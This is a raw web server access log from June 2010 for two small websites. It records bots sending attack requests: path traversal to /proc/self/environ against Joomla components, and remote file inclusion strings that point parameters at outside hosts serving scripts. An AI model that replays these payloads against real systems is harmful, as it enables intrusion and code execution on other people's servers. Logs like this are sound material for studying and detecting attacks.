203.147.62.92 - - [28/Jun/2010:09:11:05 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.147.62.92 - - [28/Jun/2010:09:11:06 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.147.62.92 - - [28/Jun/2010:09:11:16 -0700] "GET /logs/access_100621.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.30.129.57 - - [28/Jun/2010:09:11:43 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [28/Jun/2010:09:11:43 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [28/Jun/2010:09:11:43 -0700] "GET /logs/access_100329.log%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [28/Jun/2010:09:13:08 -0700] "GET /logs/access.log//index2.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [28/Jun/2010:09:13:09 -0700] "GET /index2.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [28/Jun/2010:09:13:10 -0700] "GET /logs//index2.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
67.30.129.57 - - [28/Jun/2010:09:13:12 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [28/Jun/2010:09:13:12 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [28/Jun/2010:09:13:12 -0700] "GET /logs/access_100329.log%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [28/Jun/2010:09:13:35 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [28/Jun/2010:09:13:35 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [28/Jun/2010:09:13:35 -0700] "GET /logs/access_100222.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [28/Jun/2010:09:13:35 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [28/Jun/2010:09:13:35 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [28/Jun/2010:09:13:35 -0700] "GET /logs/access_100222.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.198.177.230 - - [28/Jun/2010:09:13:41 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
88.198.177.230 - - [28/Jun/2010:09:13:41 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
88.198.177.230 - - [28/Jun/2010:09:13:42 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
74.124.198.60 - - [28/Jun/2010:09:13:48 -0700] "GET /logs/access_100510.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [28/Jun/2010:09:13:52 -0700] "GET /logs/access_100510.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.128.118 - - [28/Jun/2010:09:14:41 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.128.118 - - [28/Jun/2010:09:14:41 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.128.118 - - [28/Jun/2010:09:14:41 -0700] "GET /logs/access_100222.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.110.132.245 - - [28/Jun/2010:09:14:42 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
79.110.132.245 - - [28/Jun/2010:09:14:42 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
79.110.132.245 - - [28/Jun/2010:09:14:43 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:09:14:45 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:09:14:45 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:09:14:45 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:09:14:45 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:09:14:45 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:09:14:45 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
79.110.132.245 - - [28/Jun/2010:09:14:50 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
79.110.132.245 - - [28/Jun/2010:09:14:51 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
79.110.132.245 - - [28/Jun/2010:09:14:51 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
114.108.128.118 - - [28/Jun/2010:09:14:57 -0700] "GET /logs/access_100510.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.147.62.92 - - [28/Jun/2010:09:17:50 -0700] "GET /logs/access_100621.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.147.62.92 - - [28/Jun/2010:09:17:50 -0700] "GET /logs/access_100621.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.147.62.92 - - [28/Jun/2010:09:17:50 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.147.62.92 - - [28/Jun/2010:09:17:51 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.147.62.92 - - [28/Jun/2010:09:17:51 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.147.62.92 - - [28/Jun/2010:09:17:51 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
88.198.177.230 - - [28/Jun/2010:09:18:29 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
88.198.177.230 - - [28/Jun/2010:09:18:29 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
88.198.177.230 - - [28/Jun/2010:09:18:29 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
85.130.111.126 - - [28/Jun/2010:09:18:48 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.130.111.126 - - [28/Jun/2010:09:18:48 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.130.111.126 - - [28/Jun/2010:09:18:48 -0700] "GET /logs/access_100322.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [28/Jun/2010:09:18:52 -0700] "GET /logs/access_100412.log%20%20//bbs/write_update.php?board_skin_path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [28/Jun/2010:09:18:52 -0700] "GET /logs//bbs/write_update.php?board_skin_path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [28/Jun/2010:09:18:52 -0700] "GET /bbs/write_update.php?board_skin_path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.110.132.245 - - [28/Jun/2010:09:18:53 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
79.110.132.245 - - [28/Jun/2010:09:18:53 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
79.110.132.245 - - [28/Jun/2010:09:18:53 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
74.124.198.60 - - [28/Jun/2010:09:18:56 -0700] "GET /logs/access_100301.log%20%20//bbs/write_update.php?board_skin_path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.110.132.245 - - [28/Jun/2010:09:19:03 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
79.110.132.245 - - [28/Jun/2010:09:19:04 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
79.110.132.245 - - [28/Jun/2010:09:19:04 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
74.124.198.60 - - [28/Jun/2010:09:19:48 -0700] "GET /bbs/write_update.php?board_skin_path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [28/Jun/2010:09:19:48 -0700] "GET /logs/access_100412.log%20%20//bbs/write_update.php?board_skin_path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [28/Jun/2010:09:19:48 -0700] "GET /logs//bbs/write_update.php?board_skin_path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [28/Jun/2010:09:19:52 -0700] "GET /logs/access_100301.log%20%20//bbs/write_update.php?board_skin_path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.198.177.230 - - [28/Jun/2010:09:20:37 -0700] "GET /logs/access_100621.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
79.110.132.245 - - [28/Jun/2010:09:20:55 -0700] "GET /logs/access_100621.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
79.110.132.245 - - [28/Jun/2010:09:20:58 -0700] "GET /logs/access_100621.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
114.108.151.149 - - [28/Jun/2010:09:22:03 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.147.62.92 - - [28/Jun/2010:09:22:38 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.147.62.92 - - [28/Jun/2010:09:22:42 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.128.118 - - [28/Jun/2010:09:23:16 -0700] "GET /logs//bbs/write_update.php?board_skin_path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.128.118 - - [28/Jun/2010:09:23:16 -0700] "GET /bbs/write_update.php?board_skin_path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.128.118 - - [28/Jun/2010:09:23:16 -0700] "GET /logs/access_100412.log%20%20//bbs/write_update.php?board_skin_path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.128.118 - - [28/Jun/2010:09:23:22 -0700] "GET /logs/access_100301.log%20%20//bbs/write_update.php?board_skin_path=http://nktech.kr/bbs//data/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.37.150.18 - - [28/Jun/2010:09:34:54 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cappa.de/hilfe/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.37.150.18 - - [28/Jun/2010:09:34:54 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cappa.de/hilfe/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.37.150.18 - - [28/Jun/2010:09:34:55 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cappa.de/hilfe/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.37.150.18 - - [28/Jun/2010:09:35:11 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cappa.de/hilfe/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.37.150.18 - - [28/Jun/2010:09:35:12 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cappa.de/hilfe/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.37.150.18 - - [28/Jun/2010:09:35:12 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cappa.de/hilfe/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.94.177.94 - - [28/Jun/2010:09:35:14 -0700] "GET /logs//skin/daerew_45galleryGD/setup.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.94.177.94 - - [28/Jun/2010:09:35:14 -0700] "GET /skin/daerew_45galleryGD/setup.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.94.177.94 - - [28/Jun/2010:09:35:14 -0700] "GET /logs/access_100315.log//skin/daerew_45galleryGD/setup.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [28/Jun/2010:09:41:49 -0700] "GET /logs/access.log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [28/Jun/2010:09:41:50 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [28/Jun/2010:09:41:51 -0700] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
203.94.177.94 - - [28/Jun/2010:09:44:22 -0700] "GET /skin/daerew_45galleryGD/setup.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.94.177.94 - - [28/Jun/2010:09:44:22 -0700] "GET /logs//skin/daerew_45galleryGD/setup.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.94.177.94 - - [28/Jun/2010:09:44:22 -0700] "GET /logs/access_100315.log//skin/daerew_45galleryGD/setup.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.254.98 - - [28/Jun/2010:09:44:53 -0700] "GET /delete_all.php?board_skin_path=http://bordpladesnedkeren.dk/administrator/components/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
75.125.254.98 - - [28/Jun/2010:09:44:53 -0700] "GET /delete_all.php?board_skin_path=http://bordpladesnedkeren.dk/administrator/components/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
216.14.126.247 - - [28/Jun/2010:09:47:51 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
216.14.126.247 - - [28/Jun/2010:09:48:00 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:09:48:10 -0700] "GET /modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:09:48:10 -0700] "GET /logs//modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:09:48:10 -0700] "GET /logs/access.log%20%20//modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:09:48:12 -0700] "GET /logs/access.log%20%20//modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:09:48:12 -0700] "GET /modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:09:48:12 -0700] "GET /logs//modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:09:48:57 -0700] "GET /logs/access_100621.log%20%20//modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:09:49:00 -0700] "GET /logs//modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:09:49:00 -0700] "GET /logs/access.log//modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:09:49:00 -0700] "GET /modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:09:49:08 -0700] "GET /modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:09:49:08 -0700] "GET /logs//modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:09:49:08 -0700] "GET /logs/access.log//modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:09:49:25 -0700] "GET /logs/access_100621.log%20%20//modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:09:49:49 -0700] "GET /logs/access_100621.log//modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.37.176 - - [28/Jun/2010:09:49:52 -0700] "GET /logs/access_100524.log HTTP/1.0" 200 2784909 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:09:49:59 -0700] "GET /logs/access_100621.log//modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.7.39 - - [28/Jun/2010:09:50:08 -0700] "GET / HTTP/1.1" 200 926 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
67.195.37.176 - - [28/Jun/2010:09:50:14 -0700] "GET /logs/access_100503.log HTTP/1.0" 200 2519989 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:09:50:24 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:09:50:24 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "growlonghairfast.com"
67.195.37.176 - - [28/Jun/2010:09:51:36 -0700] "GET /logs/access_100531.log HTTP/1.0" 200 3581898 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [28/Jun/2010:09:52:02 -0700] "GET /logs/access_100426.log HTTP/1.0" 200 2491092 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
75.125.254.98 - - [28/Jun/2010:09:52:24 -0700] "GET /logs/access_100308.log//delete_all.php?board_skin_path=http://bordpladesnedkeren.dk/administrator/components/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
75.125.254.98 - - [28/Jun/2010:09:52:24 -0700] "GET /delete_all.php?board_skin_path=http://bordpladesnedkeren.dk/administrator/components/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
75.125.254.98 - - [28/Jun/2010:09:52:24 -0700] "GET /logs//delete_all.php?board_skin_path=http://bordpladesnedkeren.dk/administrator/components/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
75.125.254.98 - - [28/Jun/2010:09:52:37 -0700] "GET /logs/access_100308.log//delete_all.php?board_skin_path=http://bordpladesnedkeren.dk/administrator/components/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
75.125.254.98 - - [28/Jun/2010:09:52:38 -0700] "GET /delete_all.php?board_skin_path=http://bordpladesnedkeren.dk/administrator/components/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
75.125.254.98 - - [28/Jun/2010:09:52:38 -0700] "GET /logs//delete_all.php?board_skin_path=http://bordpladesnedkeren.dk/administrator/components/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
216.14.126.247 - - [28/Jun/2010:09:54:00 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
